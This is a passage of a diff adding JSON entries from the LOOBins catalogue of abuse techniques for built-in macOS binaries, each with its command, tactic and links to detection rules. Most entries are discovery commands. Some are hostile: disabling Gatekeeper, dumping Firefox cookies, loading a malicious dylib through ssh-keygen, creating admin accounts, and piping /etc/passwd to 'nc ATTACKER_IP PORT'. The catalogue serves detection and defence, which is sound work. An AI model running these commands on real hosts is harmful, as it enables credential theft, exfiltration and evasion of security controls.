"/usr/bin/snmptrap", + "/usr/sbin/snmptrapd" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/snmptrap.yml", + "https://net-snmp.sourceforge.io/", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:softwareupdate:1588742f064e0e3f", + "toolId": "loobins:softwareupdate", + "toolName": "softwareupdate", + "name": "Get OS and browser version information", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "softwareupdate --list", + "description": "Determine OS and Safari version by enumerating the available software updates.", + "mitre": [], + "fullPath": [ + "/usr/sbin/softwareupdate" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/softwareupdate.yml", + "https://ss64.com/osx/softwareupdate.html" + ] + }, + { + "id": "loobins:softwareupdate:231fbe890167d3a7", + "toolId": "loobins:softwareupdate", + "toolName": "softwareupdate", + "name": "Get OS update policy", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "softwareupdate --schedule", + "description": "Use the --schedule flag to return the OS update policy.", + "mitre": [], + "fullPath": [ + "/usr/sbin/softwareupdate" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/softwareupdate.yml", + "https://ss64.com/osx/softwareupdate.html" + ] + }, + { + "id": "loobins:spctl:843d31053bd2f21e", + "toolId": "loobins:spctl", + "toolName": "spctl", + "name": "Disable Gatekeeper", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "sudo spctl --master-disable", + "description": "The --master-disable switch disables Gatekeeper. The command must be run with root/sudo permission.", + "mitre": [], + "fullPath": [ + "/usr/sbin/spctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Elastic Detection Rules: Attempt to Disable Gatekeeper", + "value": "https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml" + }, + { + "type": "Sigma Rules: Disable Security Tools", + "value": "https://github.com/SigmaHQ/sigma/blob/cd71edc09ca915f389e50df5b1bbb5ecd4b7f89d/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/spctl.yml", + "https://disable-gatekeeper.github.io/" + ] + }, + { + "id": "loobins:sqlite3:06ae594029f6aa24", + "toolId": "loobins:sqlite3", + "toolName": "sqlite3", + "name": "Get apps with Full Disk access", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "sqlite3 /Library/Application\\ Support/com.apple.TCC/TCC.db \\\n'select client from access where auth_value and service = \"kTCCServiceSystemPolicyAllFiles\"'", + "description": "The following command interacts with the TCC (Transparency, Consent, and Control) database to show the apps that have Full Disk access permission", + "mitre": [], + "fullPath": [ + "/usr/bin/sqlite3" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification", + "value": "https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml" + }, + { + "type": "Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior", + "value": "https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2" + }, + { + "type": "Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml", + "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", + "https://redcanary.com/blog/clipping-silver-sparrows-wings/" + ] + }, + { + "id": "loobins:sqlite3:b28bfa60a737df07", + "toolId": "loobins:sqlite3", + "toolName": "sqlite3", + "name": "Get Firefox cookie data", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection", + "Credential Access" + ], + "nativeCategory": [ + "Collection", + "Credential Access" + ], + "command": "killall firefox; find ~/Library/Application\\ Support/Firefox/Profiles/. | grep cookies.sqlite | xargs -I {} sqlite3 {} \"select * from moz_cookies\"", + "description": "The following one-liner can be used to kill Firefox and dump cookie data from the user's Firefox profile.", + "mitre": [], + "fullPath": [ + "/usr/bin/sqlite3" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification", + "value": "https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml" + }, + { + "type": "Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior", + "value": "https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2" + }, + { + "type": "Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml", + "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", + "https://redcanary.com/blog/clipping-silver-sparrows-wings/" + ] + }, + { + "id": "loobins:sqlite3:de4f81bf94a8b374", + "toolId": "loobins:sqlite3", + "toolName": "sqlite3", + "name": "View URL associated with file downloads", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection", + "Credential Access" + ], + "nativeCategory": [ + "Collection", + "Credential Access" + ], + "command": "sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* 'select LSQuarantineDataURLString from LSQuarantineEvent'", + "description": "The following sqlite command is commonly used by macOS malware to view the URL in which the payload was downloaded from.", + "mitre": [], + "fullPath": [ + "/usr/bin/sqlite3" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification", + "value": "https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml" + }, + { + "type": "Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior", + "value": "https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2" + }, + { + "type": "Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml", + "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", + "https://redcanary.com/blog/clipping-silver-sparrows-wings/" + ] + }, + { + "id": "loobins:ssh-keygen:09fc4639a16866cd", + "toolId": "loobins:ssh-keygen", + "toolName": "ssh-keygen", + "name": "Execute malicious dynamic library (.dylib) from standard input", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Defense Evasion" + ], + "nativeCategory": [ + "Execution", + "Defense Evasion" + ], + "command": "ssh-keygen -D /private/tmp/evil.dylib", + "description": "An attacker can execute a malicious .dylib from stdin by echoing a load command and piping to tclsh. This will bypass code signing requirements.", + "mitre": [], + "fullPath": [ + "/usr/bin/ssh-keygen" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Recommendations included in resource below. No formal detection content at this time.", + "value": "https://medium.com/@D00MFist/generate-keys-or-generate-dylib-loads-c99ed48f323d" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ssh-keygen.yml", + "https://medium.com/@D00MFist/generate-keys-or-generate-dylib-loads-c99ed48f323d" + ] + }, + { + "id": "loobins:streamzip:d1107233f4c25cdc", + "toolId": "loobins:streamzip", + "toolName": "streamzip", + "name": "Copy and compress sensitive data locally", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection" + ], + "nativeCategory": [ + "Collection", + "Exfiltration" + ], + "command": "dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT", + "description": "The following command reads file data and compresses the data for exfiltration", + "mitre": [], + "fullPath": [ + "/usr/bin/streamzip" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detection content at time of writing", + "value": "No detection content at time of writing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/streamzip.yml", + "https://docs.oracle.com/cd/E88353_01/html/E37839/streamzip-1.html" + ] + }, + { + "id": "loobins:sw_vers:5efd19376b53fada", + "toolId": "loobins:sw_vers", + "toolName": "sw_vers", + "name": "Retrieving macOS Version Information", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "sw_vers", + "description": "Fetch detailed macOS version information including the build version, product name, and product version.", + "mitre": [], + "fullPath": [ + "/usr/bin/sw_vers" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml", + "https://macosbin.com/bin/sw_vers", + "https://ss64.com/osx/sw_vers.html" + ] + }, + { + "id": "loobins:sw_vers:6617de5f492de05f", + "toolId": "loobins:sw_vers", + "toolName": "sw_vers", + "name": "Retrieving macOS Product Version", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "sw_vers -productVersion", + "description": "Fetch macOS product version.", + "mitre": [], + "fullPath": [ + "/usr/bin/sw_vers" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml", + "https://macosbin.com/bin/sw_vers", + "https://ss64.com/osx/sw_vers.html" + ] + }, + { + "id": "loobins:sw_vers:b0419646786aaad1", + "toolId": "loobins:sw_vers", + "toolName": "sw_vers", + "name": "Retrieving macOS Product Name", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "sw_vers -productName", + "description": "Fetch detailed macOS product name.", + "mitre": [], + "fullPath": [ + "/usr/bin/sw_vers" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml", + "https://macosbin.com/bin/sw_vers", + "https://ss64.com/osx/sw_vers.html" + ] + }, + { + "id": "loobins:sw_vers:12adb0bc68d114b8", + "toolId": "loobins:sw_vers", + "toolName": "sw_vers", + "name": "Retrieving macOS Build Version", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "sw_vers -buildVersion", + "description": "Fetch detailed macOS build version.", + "mitre": [], + "fullPath": [ + "/usr/bin/sw_vers" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml", + "https://macosbin.com/bin/sw_vers", + "https://ss64.com/osx/sw_vers.html" + ] + }, + { + "id": "loobins:swift:db1eec9ae07ce64e", + "toolId": "loobins:swift", + "toolName": "swift", + "name": "Execute Swift code file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "swift mycode.swift", + "description": "Executes the Swift code that is in a .swift file", + "mitre": [], + "fullPath": [ + "/usr/bin/swift" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Process & Command Line Argument Detection (process contains swift)", + "value": "Process & Command Line Argument Detection (process contains swift)" + }, + { + "type": "Jamf Protect: Detect arbitrary code execution using a swift one-liner", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml", + "https://developer.apple.com/swift/blog/?id=18", + "https://jblevins.org/log/swift", + "https://krakendev.io/blog/scripting-in-swift", + "https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line", + "https://ed.com/command-line-swift/" + ] + }, + { + "id": "loobins:swift:4774f10c89e8cf8c", + "toolId": "loobins:swift", + "toolName": "swift", + "name": "Execute Swift one-liner before swift 5.8 / Xcode 14.3 Beta 1", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Defense Evasion" + ], + "nativeCategory": [ + "Execution", + "Defense Evasion" + ], + "command": "echo 'print(\"loobins\")' | swift -", + "description": "Executes a Swift one-liner by piping an echoed string into the swift command", + "mitre": [], + "fullPath": [ + "/usr/bin/swift" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Process & Command Line Argument Detection (process contains swift)", + "value": "Process & Command Line Argument Detection (process contains swift)" + }, + { + "type": "Jamf Protect: Detect arbitrary code execution using a swift one-liner", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml", + "https://developer.apple.com/swift/blog/?id=18", + "https://jblevins.org/log/swift", + "https://krakendev.io/blog/scripting-in-swift", + "https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line", + "https://ed.com/command-line-swift/" + ] + }, + { + "id": "loobins:swift:1d38d36cc5bfdc09", + "toolId": "loobins:swift", + "toolName": "swift", + "name": "Execute Swift one-liner with swift 5.8 / Xcode 14.3 Beta 1 or greater", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Defense Evasion" + ], + "nativeCategory": [ + "Execution", + "Defense Evasion" + ], + "command": "swift -e 'import Foundation; let process = Process(); process.executableURL = URL(fileURLWithPath:\"/bin/bash\"); process.arguments = [\"-c\", \"ls -alh\"]; let stdout = Pipe(); let stderr = Pipe(); process.standardOutput = stdout; process.standardError = stderr; try process.run(); print(String(decoding: stdout.fileHandleForReading.readDataToEndOfFile(), as: UTF8.self)); print(String(decoding: stderr.fileHandleForReading.readDataToEndOfFile(), as: UTF8.self));'", + "description": "Executes a Swift one-liner that executes the ls command to list the current directory using the -e option that was implemented in swift 5.8 / Xcode 14.3 Beta 1", + "mitre": [], + "fullPath": [ + "/usr/bin/swift" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Process & Command Line Argument Detection (process contains swift)", + "value": "Process & Command Line Argument Detection (process contains swift)" + }, + { + "type": "Jamf Protect: Detect arbitrary code execution using a swift one-liner", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml", + "https://developer.apple.com/swift/blog/?id=18", + "https://jblevins.org/log/swift", + "https://krakendev.io/blog/scripting-in-swift", + "https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line", + "https://ed.com/command-line-swift/" + ] + }, + { + "id": "loobins:sysadminctl:b115efd1e19c6561", + "toolId": "loobins:sysadminctl", + "toolName": "sysadminctl", + "name": "Enable Guest Account", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Initial Access" + ], + "command": "sudo sysadminctl -guestAccount on", + "description": "sysadminctl can be used to enable the guest account", + "mitre": [], + "fullPath": [ + "/usr/sbin/sysadminctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Creation Of A Local User Account", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + }, + { + "type": "Sigma: User Added To Admin Group Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" + }, + { + "type": "Sigma: Guest Account Enabled Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", + "https://ss64.com/mac/sysadminctl.html" + ] + }, + { + "id": "loobins:sysadminctl:08b699f562d93afa", + "toolId": "loobins:sysadminctl", + "toolName": "sysadminctl", + "name": "Create Local User Account", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "sudo sysadminctl -addUser randomUser -password \"randomPassword\"", + "description": "sysadminctl can be used to create a local user account", + "mitre": [], + "fullPath": [ + "/usr/sbin/sysadminctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Creation Of A Local User Account", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + }, + { + "type": "Sigma: User Added To Admin Group Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" + }, + { + "type": "Sigma: Guest Account Enabled Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", + "https://ss64.com/mac/sysadminctl.html" + ] + }, + { + "id": "loobins:sysadminctl:5ac210cb243ba82b", + "toolId": "loobins:sysadminctl", + "toolName": "sysadminctl", + "name": "Create a Local Admin Account", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "sudo sysadminctl -addUser randomUser -password \"randomPassword\" -admin", + "description": "sysadminctl can be used to create a local admin account", + "mitre": [], + "fullPath": [ + "/usr/sbin/sysadminctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Creation Of A Local User Account", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + }, + { + "type": "Sigma: User Added To Admin Group Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" + }, + { + "type": "Sigma: Guest Account Enabled Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", + "https://ss64.com/mac/sysadminctl.html" + ] + }, + { + "id": "loobins:sysadminctl:f4e8242891928d05", + "toolId": "loobins:sysadminctl", + "toolName": "sysadminctl", + "name": "Reset user password", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "sudo sysadminctl -resetPasswordFor randomUser -newPassword \"randomPassword\"", + "description": "sysadminctl can be used to reset password for a particular user account", + "mitre": [], + "fullPath": [ + "/usr/sbin/sysadminctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Creation Of A Local User Account", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + }, + { + "type": "Sigma: User Added To Admin Group Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" + }, + { + "type": "Sigma: Guest Account Enabled Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", + "https://ss64.com/mac/sysadminctl.html" + ] + }, + { + "id": "loobins:sysadminctl:27d8e96a6674435a", + "toolId": "loobins:sysadminctl", + "toolName": "sysadminctl", + "name": "Delete a local account", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Impact" + ], + "command": "sudo sysadminctl -deleteUser randomUser", + "description": "sysadminctl can delete the specified user account", + "mitre": [], + "fullPath": [ + "/usr/sbin/sysadminctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Creation Of A Local User Account", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + }, + { + "type": "Sigma: User Added To Admin Group Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" + }, + { + "type": "Sigma: Guest Account Enabled Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", + "https://ss64.com/mac/sysadminctl.html" + ] + }, + { + "id": "loobins:sysadminctl:22d7cd044623e281", + "toolId": "loobins:sysadminctl", + "toolName": "sysadminctl", + "name": "Enable SMB Guest Access", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Exfiltration" + ], + "command": "sudo sysadminctl -smbGuestAccess on", + "description": "sysadminctl can enable SMB Guest Access", + "mitre": [], + "fullPath": [ + "/usr/sbin/sysadminctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Creation Of A Local User Account", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + }, + { + "type": "Sigma: User Added To Admin Group Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" + }, + { + "type": "Sigma: Guest Account Enabled Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", + "https://ss64.com/mac/sysadminctl.html" + ] + }, + { + "id": "loobins:sysadminctl:871ffb7fecbb33cb", + "toolId": "loobins:sysadminctl", + "toolName": "sysadminctl", + "name": "Enable AFP Guest Access", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Exfiltration" + ], + "command": "sudo sysadminctl -afpGuestAccess on", + "description": "sysadminctl can enable AFP Guest Access", + "mitre": [], + "fullPath": [ + "/usr/sbin/sysadminctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Creation Of A Local User Account", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + }, + { + "type": "Sigma: User Added To Admin Group Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" + }, + { + "type": "Sigma: Guest Account Enabled Via Sysadminctl", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", + "https://ss64.com/mac/sysadminctl.html" + ] + }, + { + "id": "loobins:sysctl:4c999f9f530dbf76", + "toolId": "loobins:sysctl", + "toolName": "sysctl", + "name": "Use sysctl to gather macOS hardware info.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "sysctl -n hw.model", + "description": "sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.", + "mitre": [], + "fullPath": [ + "/usr/sbin/sysctl" + ], + "environment": [ + "Local host" + ], + 